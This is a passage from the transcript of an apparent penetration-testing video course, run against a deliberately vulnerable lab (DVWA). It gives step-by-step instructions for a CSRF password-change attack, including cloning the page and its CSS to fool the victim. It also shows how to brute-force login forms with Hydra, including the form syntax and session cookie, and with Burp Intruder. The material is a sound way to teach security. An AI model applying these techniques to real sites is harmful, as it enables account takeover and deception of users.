account. If I type ls, we got our tester.py, we can remove it, we no longer need it here, and once you got this directory clear and empty, let us nano csrf.html file. Let's call it like that. Now feel free to call it anything that you want, just make sure that you have this HTML extension onto this file. Now that we opened it, we can paste the code that we copied from the page, and you will notice it is the form where we change our password. Now, there are a few things that we want to change right here. For example, this action, we want to change to the page link where we change our password on our DVWA, and that page link is this link right here. Let's copy it. Let's paste it right here. And what this action simply refers to is once we change the password, it will redirect us to whatever page is inside of this action field. So it will just redirect us back to this page right here. Let's copy this and paste it. Now that we got the page right here, there are two more things that we need to add in order for this attack to work, and that is inside of these input fields. So we got the name of the field, which is password new. I believe it is this field right here, and the second field is confirm new password, which is this field right here, password confirm. We want to automatically add value to those fields, and in this case, that value will be a new password. So what we can do is we can type space right after the password name, and we can type value equals, open double quotes, and in between the double quotes, we can type the new password. Let's say the new password is hacked. We must do that for the second field as well. So value equals, open double quotes, and then hacked. Now, you will notice once we visit this page that in that case, the fields will already be completed. They will have this hacked value inside of both of these fields. Let's give it a try. If I save this, Control O, and I start my Apache 2 web server by typing service Apache 2 start. All we need to do right now is visit our localhost and the csrf.html file, which is the only file inside of our Apache 2 web server directory. So we got this right here. And this is the link that we would want to send to our victim. Now I know it doesn't nearly look as good as this page right here, but let's just give it a try to see if it works. If we did everything correctly, once we click on this change button on our localhost CSRF file, we will successfully change the password of the admin account on this DVWA page. So we send this to the target clicks on change, and we get redirected to our Metasploitable DVWA CSRF page, and it says password changed. Let's see whether it indeed got changed. Remember, we typed the value of hacked, and now if I go right here and type admin and hacked, well, it worked. We logged in with new password that someone typed in while visiting our page on our local host. But if you noticed on this page, we only copied the form, and if we were to host just the form code on our Apache 2 server, like we're doing right now, it would look suspicious because if we take a look at this page and this page, they don't look nearly the same. So how can we make it look the same? Well, first thing that we must do is we must go right here, right click, view page source, and we must copy the entire HTML code and not just the form. So what you can do is you can select the page, type Ctrl A, it will select all the code inside of this file, and we can copy it. Then we can go to our Apache web directory and we can remove the CSRF file and we can nano new one. Here we will paste the entire code. And remember that we must do the same thing that we did inside of our form. So find the form code, and here we want to put the link to our page, which is this link once again. Copy it, paste it right here. We also want to add the value to our password fields. We can change right now the password back to password, just so we put it back as it was. And now that we did this, we can save this, and if I go and visit the page once again, or I just reload this page, well, it looks a little bit better, but it is still not the same page. We're missing some decoration that this page has. And if you have some experience in web development, you will know that we're missing the CSS file. So what we can do to add the CSS file is we can go to this page source of our page that we got open, and we can navigate to the CSS file. So just search for any file type that ends with .css. And if I go up here, here is one of them, and it is called main.css. And by looking at this page, it seems that this is the only CSS file that this page has. So let's click on that, and here is the CSS code that we also must save in the same directory as our HTML file. So let's select everything, copy this, and let's go back to our web directory. Right here we are going to nano main.css, and let's just paste all of this code. Now that we have the CSS code right here, we can save this, but it will still not work if we don't change the file location inside of our code. Because if you take a look at right here, where we add the CSS file, it is still the location on our Metasploitable machine. And since we have it in the same directory as our HTML file on our Apache 2 web server, what we can do is we can just remove the entire path and leave just the name of the file, because they're both located in the same directory. So we can just leave it like this. Then we can save this. And now if we refresh our local host page, well, now it looks the same. just this page isn't zoomed in, so what we can do is we can zoom this in and they look exactly the same. So the password is, remember right now, just password, and if we click on change, it will redirect us to the real page and it will say the password has changed. Let's give it a try once again and see whether it indeed got changed. So I will just go to my DVWA page, log out, and type admin and then password. And we did it again. Just this time we made our page look exactly the same, as we can see right here. Great. This is the CSRF attack, or cross-site request forgery attack. As you can see, it requires to open our link, otherwise this will not work, but if you manage to trick them by making the page look identical, then this attack will work and you will successfully change their password. Now this can be performed on other stuff and not just the password fields. As we remembered, you can use this to change emails, to change dates, and many other things as well. Now that we covered this, in the next video we're going to cover brute force attack. And we're going to see how we can perform the brute force attack in 2 different ways. So thank you for watching and I will see you in the next lecture. Bye. Welcome back. And in this lecture, I want to talk about the subject on brute forcing different login pages. So we talked about many different attacks that were based on some type of a vulnerability, either a code injection or CSRF attack or command injection. All of those were bugs that we covered. But we haven't covered how to brute force a login page. And for this entire section, we have been logging into this username and password field whenever we want to access the DVWA page. Let's say that we don't have the credentials for this page. We know, of course, that they are admin and password, but let's also see how we can try to brute force them, how we can try to guess the credentials. Of course, for this, we're going to need to have a little bit of luck because this will require that inside of the password list that we're going to use, we have their password there. So this will only work if their password is pretty weak, which in our case it is, since the password is just password. For this, we're going to use a tool called Hydra. And Hydra is already pre-installed in Kali Linux, so you can just type Hydra inside of your terminal, and this will give you the help menu of the tool. However, I advise you not to look at this help menu because it will be in no way helpful for these types of the attacks. As we can see right here, it gets the example of usage, but once attacking the actual web pages, this becomes harder and harder to use. The syntax becomes harder and harder. So I advise you to actually pay attention once I'm writing syntax so you can see how exactly am I doing it, because for every web page that has a login page with username and password, this syntax will be different. So let's start crafting our command. We're going to start with Hydra, and then after it we specify the IP address of our target, which in my case is 192.168.1.9, as we can see right here. Then you got a few options that you need to specify right here, which are based on how are you sending the username and password to the target. So in this case, if I type test right here and test as password, I click on login, this is being sent as a post form. So we are applying these usernames and passwords to the form, and we are sending this to the target with post request. You can always check that right here inside of your burp suite. So you can go down here and we can see that this is a post request where we sent the test username and test password. Okay, so how we can specify that inside of Hydra? Well, we can specify http-form-post. After this, you need to open the double quotes, and in between the double quotes, the first argument that you must specify for the page that you're brute forcing is the path to that page, which requires username and password. And in our case, that path is /dvwa/login.php. So that is the first argument specified in between the double quotes, and arguments that you specify between these double quotes are separated with 2 dots. So once we type the path, we type 2 dots for the second argument, and the second argument is the username. So for this, we must go to the page that we are brute forcing, we must right click and go to view page source, and we must find the name for the username field inside of the code. Usually the username and password fields will be inside of some type of a form, as we can see right here, form action login.php method post. And if I go to the label for the username, we can see that the name for the username field is simply just username. Okay, so we must copy the name of this field and we must go right here and type it in. So paste it right after, and this username field will be equal to upper arrow and capital user, and then once again upper arrow. Now you might be wondering what is happening here. Well, after we specify the name of the field on our page, we equal that to this syntax right here, and this is just Hydra syntax. You use this upper arrow right here, and you type user in between that, and you close it with upper arrow. What this is telling to the program to do is it will exchange any username that we have in a list between these two upper arrows. So essentially, any type of username from the list that we're going to use will be stored right here. But this is not the only field that we have. We also must specify the same thing for the password field. Now, to separate the username field from the password field, we use this sign right here. So specify this sign, and then after it, we can specify the password field name, just like we did right here. So let's go and find the label for the password. Here it is. And the name for the password field is simply just password. And this is something that can change depending on which page you're brute forcing. So let's go right here and type password, which is the name of our field, and this will be equal to upper arrow and then pass, and then once again upper arrow. And this is also the same as with the username, so just any passwords that we use from our list will get stored right here instead of this capital pass. And the last thing that we must set for this second argument of our command is the button that we're using. So every time you actually try to log in, you click on this login button. And this is something that we also want to simulate inside of our Hydra command. To do that, we go view page source, we find the button, which is usually right after the username and password field, and in our case here it is. We take a look at the type of button and the button name. So we can see that the button name is login, which we are going to specify, and then we're going to equal that to submit. So we can do it like this. Again, we need to separate it with this sign right here, and we type the name of the button, which is login, and then equal to the type of the button, which is in our case submit. So we equal that to submit. And these three steps right here, which is username, password, and button, are enough for us to actually submit a request for a specific username and password. But we also need to differentiate a valid username and valid password from the incorrect username and incorrect password. So how are we going to do that? Well, luckily Hydra allows us to specify something that will stick out once a password is incorrect. And if we go to our page and we specify the incorrect username and incorrect password, once you click on login, you will notice that down here we have this string that says login failed. Now, just by thinking, we can figure out that this string will not exist if we manage to log in with successful credentials. So we can specify this string to our Hydra command to search for it, and every time it finds it, it will not print out that username and password as valid username and password, because they are incorrect. So we can specify it with 2 dots and then paste it right here. Login failed will be the string that we are searching for, which will indicate that the username and password is incorrect. After we specify this, we can exit out of the double quotes, and all we're left to do is to specify -l and then the list for the usernames, which we are going to call usernames.txt, and -p, which will be the list for the passwords, which we are going to call passwords.txt. Now for these lists, you can use any type of list that you want. In my case, since we don't have them, I'm just going to create them real quick for the purposes of this tutorial. I need to make sure that I'm in the same directory where I'm running this command, and then I'm going to nano usernames.txt, and I'm going to type right here root account admin, then lowercase admin, password as a username, test123, and bunch of other things we are not going to specify. We can just leave it to be this small, just so we don't waste too much time brute forcing that page. And here we can type test 1 2 3 1 2 3 4 5 6 7 8 9, and then we can type admin root password and password 1 2 3. So we do have the correct username and the correct password inside of both of these lists. Now that we have this, what we can do is we can run our command. Let's just double check it real quick. So Hydra, the IP address of our target. We're using the HTTP form post because we are sending a post request and we are sending our username and password inside of a form. Then we open double quotes, and the first argument is going to be the path to the page that the login form is located in. The second argument is going to be username, password, and the button that we are submitting the username and password with. And the third argument inside of double quotes is going to be a string that we get once we specify the incorrect username and password. After it, we just specify -L for the usernames list and -P for the passwords list. If I click enter, and here it is. It managed to find the correct username and correct password. It printed it out right here, and it tells us that the username is admin and that the password is password. So it finished relatively quick, but it only had around 49 login tries, as it says right here. So you can feel free to use a bigger password lists in order to give this even higher chances to work. Now that we did this, let's give it a try and let's log in with the username and password that we got, and it indeed works. So our tool successfully brute forced the login. Now, in the next video, we're also going to take a look at how we can brute force this page right here, which is the brute force login page inside of our DVWA. Welcome back. Let's continue with our brute forcing of DVWA page. So we successfully brute forced the welcome login screen, but now we also got this brute force page right here that also requires username and password. Now this is pretty much the same thing, just this is a different page, so the syntax of the Hydra command will be different. Of course, if I were to type admin and password right here, it would still work. It would tell me welcome to the password protected area admin. But if I were to type something like test and then test, it would not work this time. So we must craft a specific command just for this page. If we were to use the command that we used from the previous video, which is this one, it would not work because it is not the same page, it is not the same type of HTTP form post, and it is also not the same type of fields. So let's clear the screen right here and let's start crafting our command. We're going to start it the same, which is Hydra and then the IP address of our target machine. Remember that in the previous video we used HTTP form post because our usernames and passwords were sent with post request. This time, if we take a look at the link right here, we can see that the usernames and passwords are being sent inside of the link. And this is a good indication that this is a GET request. Of course, you can also check that by visiting the page source, finding the form where you submit usernames and passwords, and here it is. And under the form, we can see that the method is GET. So this time, we cannot use HTTP form post, we must use HTTP GET form. So this is the syntax once we're sending the GET request. The next step is, remember, we open the double quotes, and in between the double quotes, the first argument is specifying the path to the page. So we must go right here, let us close this, and let's just refresh this page, just so we can get the path to it. So I'm just going to go right here, and we get the path to the page, which is going to be /dvwa /vulnerabilities /brute and / at the end. Copy this and specify it as the first argument right here And remember, once we do that, we separate the second argument by typing 2 dots. And now comes the part where we specify the username, password, and button field. So let's go to the page, view page source once again, and let's find the name of the username field first. Here is the form. The first part is the username field, and its name is just username. So let's go to our command and type username equals upper arrow, user upper arrow. We separate the username from password with this sign. Let's go and check out what's the password name. It is just password, and let's do the same as in the previous video. Pass, upper arrow, and the last part is the button, which we can even get from the link itself. So if I type hello as username and world as password, we can see right here in the link that the button login equals login. So we can just copy this, go to our command and paste it right here. And the last argument inside of the double quotes is, if you remember, we must specify what is the string that we get once we specify the incorrect username and password. And we can see it right here. It says username and or password incorrect. So let's just copy this and let's paste it right here. Great. Now, if we go outside and specify -l and then usernames.txt and -p for the passwords.txt, if I press enter, you will notice that it will not work. It will tell me that every username and every password is correct. Sometimes when this happens, you haven't specified enough arguments. Either you have a syntax error inside of your command, or you didn't specify something well, or you're missing additional arguments such as the cookie value. So sometimes we must specify the cookie value also in order for this to work. Let me show you what I mean. To specify the cookie value, we must go right here, and before closing the double quotes, we're going to add another argument. So separate 2 dots, and we can type h-cookie, 2 dots, and the cookie value right next to it. How do we get the cookie value? Well, we get it with the help of burpsuite. So let's find the HTTP request where we send the hello and world as usernames and passwords, and let's see what cookie do we have right there. So let's go right here, let's try to find it. It is right here, /dvwa/vulnerabilities. Let's just find the correct request. And here it is. Here we can see inside of the link that we are sending hello as username and world as password. And the cookie that we have is this right here. So we want to copy all of it, including the security equals low and including the PHP session ID equals and then our cookie value. So copy that, go to the command, and right here you can paste the cookie value. So after the 2 dots, h-cookie, 2 dots, and then the cookie value right here. If I try it once again, well, now it works. Now it tells me that the username is admin and that the password is password. Just keep in mind that sometimes Hydra doesn't really make a difference between capital and lowercase letters. That's why we got 2 results right here. But it gave us the correct username and the correct password. So once you notice that the brute force doesn't work, try adding this cookie value and then it might actually work, because if you remember, once we didn't have it, it gave us that all of the usernames and all of the passwords are valid and that we can log in with all of that. So the difference, once again, between this and previous command is inside of this HTTP GET form, because we are sending with the GET request, then we have the different link, the username and password fields are the same, and the string that we get once specifying the incorrect password is also different. And here we also specify a cookie value, which we didn't have to specify in the previous video. Okay, great. Now that we covered the Hydra tool, in the next video I will show you a way how you can perform brute force much easier with the help of burpsuite tool. See you there. Welcome back. And in this video I want to talk about another cool feature of burpsuite that could allow us to perform the brute forcing of a login page a lot more easier than we did with Hydra tool. So burpsuite besides you being able to inspect all the packets and intercept the packets and change them, you can also do some other cool things as well. And one of those cool things is brute forcing a login page. Now this is something that we're going to perform with the community version, and the community version of Burpsuite has some limitations. The brute forcing will not go as fast as if you, for example, had the pro version, but nonetheless, let us see how it would look like. So let's go and visit the login page of our DVWA. If I navigate right here, and here we must log into our DVWA. The first thing that we want to do is we want to specify any credentials right here, for example, test and test. And once we click on login, this request that we just performed on our DVWA page will be saved inside of our Burpsuite. So under the targets, we got our target machine right here. And if I find the packet, here it is. Here is the packet that we sent. So we sent the post request and we sent our username of test and password of test to the target web page. Now, what we want to do in order to perform the brute forcing attack is we want to first right click on this packet, which we use to send our username and password, and we want to send it to intruder. Click on that and you will see this intruder bar light up. You want to navigate to the intruder, and here there are some options that we want to set before being able to brute force a web page. So here under the target tab, there is nothing that we want to change. Let us just move on to the positions tab. And in the positions tab, you will see this request that we just sent. You will see some of the fields that are already selected. And you will see this attack type bar up here. The first thing that we want to change is we want to change the attack type from sniper to cluster bomb. And what this simply means is since we're going to brute force both username and password, we want to be able to send both of them at the same time, and we can do that with the help of cluster bomb. If you, for example, knew the username and you just wanted to brute force the password, you could select right here sniper, and then you could just brute force a password. Right now we're going to go with the cluster bomb, and here we got 5 fields selected. Now we don't need all of them, we only need the username and password field selected, so what we can do is we can click on this clear button. It will unselect all of these fields, and then to select the fields that we want, we can just double click on the field. For example, username equals test. I double click on test, it will select it, then I click on add. And I do the same for the password, select it right here, and I click on add. This will select just username and password, and once we do that, we can navigate to the payloads tab, where we're going to see a bunch of other options that we can also set. So under these payload sets, this will be the payload set for the username, and if I select this number 2, this will be the payload set for the password, because those are the only 2 fields that we selected. If I go with the username first, so I change right here to 1, I will select the payload type to be a simple list, because we're going to brute force with a list, and under the payload options, I want to load that list. So I just click on this load button, then I can find usernames.txt, and you can see by default it will load all of the usernames from that list. Now I can delete this empty field, we don't really need it, and once I do that, once I load the usernames list right here, I can change from 1 to 2, and now I leave it once again on simple list, and here I want to load the passwords.txt. So once again, I find the passwords.txt, and it will load all of the passwords from that file. Once all of that is ready, that would be pretty much it. We are ready to start our attack. So if I click right here on Start Attack, it will tell me that the community edition of Burpsuite contains a demo version of Burp Intruder, so some functionality will be disabled. We already knew that, so let's just go and click on OK. And this will start our attack. Down here we can see the progress bar as to how fast this goes, and you will notice it goes a little bit slower than the Hydra tool, but nonetheless it is still brute forcing our page. Let's wait for it to finish. And it has finished, but it seems that we didn't get any results right here. And by the way, inside of the intruder, how we can search for results is you can see all of the combinations of usernames and passwords right here. We can see the status, and we can also see the length. Now, the length for the correct username and password will in 99.9% of cases be different than the incorrect usernames and passwords. And in this case, it seems that all of them have the same length, so for some reason it didn't manage to find our correct username and password. Now, that could be due to many reasons, but if I just select one of the combinations and I go to the response, we get the 302 found. If I scroll down inside of the response, it doesn't give us any HTML content. This usually means that it is performing redirection. And if I go to our options inside of our intruder, all the way down under the options, we get follow redirections, never. So what I'm going to do is I'm going to check this on always, and I'm going to start the attack once again. Click on OK. And now we can see it has different type of length. Now all we need to do is wait for the combination of admin and password, and hopefully this time we're going to get different length of the response for the correct username and correct password. So let's wait for this to finish. Okay, so it has finished, and let's scroll all the way down. We can see every response has the length of 1638. And if I scroll down here, we can see that the combinations of admin and password, both capital and lowercase, have different length. This is a pretty good indication that these are the correct usernames and correct passwords. We can also see that it did indeed perform the redirection, as we can see multiple requests and multiple replies right here. So that would be about it. This is a simple way that you can perform brute forcing with the help of burpsuit. Now, I'll still prefer the Hydra tool due to it being a little bit faster than the burpsuit intruder, but this one, however, is easier to perform, since for Hydra you need to perform different type of syntax and sometimes it might not work, while this is just setting some of the options, selecting the fields and running the brute force attack. Now that we finished this, in the next section we are ready to start our coding projects regarding the web application penetration testing. See you there.